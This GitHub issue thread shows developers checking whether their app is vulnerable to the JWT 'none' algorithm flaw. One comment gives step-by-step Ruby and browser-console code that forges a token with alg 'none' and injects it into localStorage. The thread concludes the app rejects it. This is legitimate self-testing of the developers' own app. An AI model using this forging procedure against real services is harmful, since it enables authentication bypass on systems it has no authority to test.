### ISSUE TITLE
JWT "none" algorithm Critical Vulnerability 

### ISSUE THREAD

**Issue by hisapy** [iporaitech/pwr2-docker#51]
Make sure we don't have this [this vulnerability](https://auth0.com/blog/critical-vulnerabilities-in-json-web-token-libraries/)

**Comment by edipox** [comment]
I don't think we have this vulnerability given that we have an **allowed_algos** with a single `"HS512"` algorithm in our **guardian** config. Anyway I'll keep trying to reproduce those vulnerabilities

**Comment by edipox** [comment]
## Procedure

To parse the string and encode/decode it I used the ruby console irb because I am very used to it, but you can use any other specific method to reproduce the issue.

## Steps

You can reproduce my tests with the following steps:

#### Log in.

#### Open web browser's developer tools and check what is the content of localStorage.accessToken.

In my case the content was

``` javascript
"eyJhbGciOiJIUzUxMiIsInR5cCI6IkpXVCJ9.eyJhdWQiOiJVc2VyOjEiLCJleHAiOjE0NzgzNzYwOTgsImlhdCI6MTQ3NTc4NDA5OCwiaXNzIjoiV2ViYXBwIiwianRpIjoiYzE2ODQ2NTYtYmQxOS00YzY4LTllYmMtNzY3OTBkOTRhZjU4IiwicGVtIjp7fSwic3ViIjoiVXNlcjoxIiwidHlwIjoidG9rZW4ifQ.m0YnTZR-P0HLQXjUFTR47Gicp3a2OxPV-70Lx-ZwFdabuk1qx4mIxP_JHIBmpzJ_tSMbrhY-qGdADU_V8z5VxQ"
```

so I created a variable in irb: 

``` ruby
access_token = "eyJhbGciOiJIUzUxMiIsInR5cCI6IkpXVCJ9.eyJhdWQiOiJVc2VyOjEiLCJleHAiOjE0NzgzNzYwOTgsImlhdCI6MTQ3NTc4NDA5OCwiaXNzIjoiV2ViYXBwIiwianRpIjoiYzE2ODQ2NTYtYmQxOS00YzY4LTllYmMtNzY3OTBkOTRhZjU4IiwicGVtIjp7fSwic3ViIjoiVXNlcjoxIiwidHlwIjoidG9rZW4ifQ.m0YnTZR-P0HLQXjUFTR47Gicp3a2OxPV-70Lx-ZwFdabuk1qx4mIxP_JHIBmpzJ_tSMbrhY-qGdADU_V8z5VxQ"
```

#### Decode the token:

In irb I separated the token: 

``` ruby
divided_token = access_token.split(".")
```

#### Then I created a variable for each part:

``` ruby
original_header = divided_token[0]
payload = divided_token[1]
signature = divided_token[2]
```

You can also do this manually:

``` ruby
original_header = "eyJhbGciOiJIUzUxMiIsInR5cCI6IkpXVCJ9"
signature = "m0YnTZR-P0HLQXjUFTR47Gicp3a2OxPV-70Lx-ZwFdabuk1qx4mIxP_JHIBmpzJ_tSMbrhY-qGdADU_V8z5VxQ"
payload = "eyJhdWQiOiJVc2VyOjEiLCJleHAiOjE0NzgzNzYwOTgsImlhdCI6MTQ3NTc4NDA5OCwiaXNzIjoiV2ViYXBwIiwianRpIjoiYzE2ODQ2NTYtYmQxOS00YzY4LTllYmMtNzY3OTBkOTRhZjU4IiwicGVtIjp7fSwic3ViIjoiVXNlcjoxIiwidHlwIjoidG9rZW4ifQ"
```

#### Optional: you can decode the variables. It is funny to see what is inside the token:

``` ruby
 Base64.decode64(original_header)
 Base64.decode64(payload)
 Base64.decode64(signature)
```

#### In irb I created a new header with the *_none_algorithm and encoded it:

``` ruby
header = '{"alg":"none","typ":"JWT"}'
encoded_header = Base64.encode64(header)
```

This is the result:

``` ruby
encoded_header = "eyJhbGciOiJub25lIiwidHlwIjoiSldUIn0=\n"
```

#### Then I just created a new token (still using irb):

``` ruby
new_token = [encoded_header, payload, signature].join(".")
```

This is the result:

``` ruby
"eyJhbGciOiJub25lIiwidHlwIjoiSldUIn0=\n.eyJhdWQiOiJVc2VyOjEiLCJleHAiOjE0NzgzNzYwOTgsImlhdCI6MTQ3NTc4NDA5OCwiaXNzIjoiV2ViYXBwIiwianRpIjoiYzE2ODQ2NTYtYmQxOS00YzY4LTllYmMtNzY3OTBkOTRhZjU4IiwicGVtIjp7fSwic3ViIjoiVXNlcjoxIiwidHlwIjoidG9rZW4ifQ.m0YnTZR-P0HLQXjUFTR47Gicp3a2OxPV-70Lx-ZwFdabuk1qx4mIxP_JHIBmpzJ_tSMbrhY-qGdADU_V8z5VxQ"
```

#### Now you can set your brand new token in your browser's local storage:

``` javascript
localStorage.setItem("accessToken", "eyJhbGciOiJub25lIiwidHlwIjoiSldUIn0=\n.eyJhdWQiOiJVc2VyOjEiLCJleHAiOjE0NzgzNzYwOTgsImlhdCI6MTQ3NTc4NDA5OCwiaXNzIjoiV2ViYXBwIiwianRpIjoiYzE2ODQ2NTYtYmQxOS00YzY4LTllYmMtNzY3OTBkOTRhZjU4IiwicGVtIjp7fSwic3ViIjoiVXNlcjoxIiwidHlwIjoidG9rZW4ifQ.m0YnTZR-P0HLQXjUFTR47Gicp3a2OxPV-70Lx-ZwFdabuk1qx4mIxP_JHIBmpzJ_tSMbrhY-qGdADU_V8z5VxQ")
```

## Results

I've got those results working over this code 73e7319fd93dab9e2acdabb6153702ada128d16f

### Bad news

~~With this new token I was able to create a new ship in the star wars section.~~ 
Update: The auth checks for _star wars mutations_ were not implemented when I tried this. But there is an issue for that case #42 

### Good news

After reload the page I wasn't able to do anything and after a second I got this error:

```
Warning: RelayReadyState: Invalid state change from `{"aborted":false,"done":false,"error":{},"events":[{"type":"NETWORK_QUERY_START"},{"type":"CACHE_RESTORE_START"},{"type":"CACHE_RESTORE_FAILED"},{"type":"NETWORK_QUERY_ERROR","error":{}}],"ready":false,"stale":false}` to `{"error":{}}`.
```

Update 2: This error means that we were not managing auth errors. So I've created this issue #52

**Comment by edipox** [comment]
Fortunately we don't have this vulnerability so I am closing this issue
